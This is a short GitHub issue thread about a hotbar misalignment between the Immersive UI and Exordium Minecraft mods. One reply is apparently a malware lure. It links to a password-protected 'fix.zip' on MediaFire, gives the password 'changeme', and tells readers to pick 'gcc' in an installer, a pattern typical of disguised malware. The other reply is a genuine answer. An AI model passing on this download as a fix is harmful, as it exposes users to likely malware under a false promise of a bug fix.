### ISSUE TITLE
Bug with Exordium

### ISSUE THREAD

**Issue by tsokiyZan** [Octo-Studios/immersive-ui#12]
When exordium (a mod that limits the fps of the GUI separately) is installed along with immersive UI, the hot bar selector box gets misaligned with the boxes

**Comment by cnhbliyou** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by catboybinary** [comment]
Exordium shouldn't really be installed alongside Immersive UI in the first place, since it defeats the mod's purpose. Enjoy your UI in full FPS :D
